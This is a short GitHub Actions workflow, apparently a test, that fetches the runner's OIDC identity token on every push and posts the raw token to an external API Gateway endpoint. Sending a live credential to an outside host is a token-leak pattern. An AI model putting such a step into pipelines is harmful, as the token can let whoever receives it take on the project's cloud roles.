name: Test OIDC

on: [push]

permissions:
  id-token: write

jobs:
  test-oidc:
    runs-on: ubuntu-latest
    steps:
      - name: Get OIDC Token and Send to API
        run: |
          echo "Fetching OIDC token..."
          token=$(curl -sS -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
            "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com")

          echo "Token acquired. Posting to API..."

          # Use jq to safely wrap it in JSON
          payload=$(jq -n --arg token "$token" '{token: $token}')

          curl -X POST -H "Content-Type: application/json" \
            -d "$payload" \
            "https://2sc5lj0u1l.execute-api.us-east-1.amazonaws.com/prod/ident"
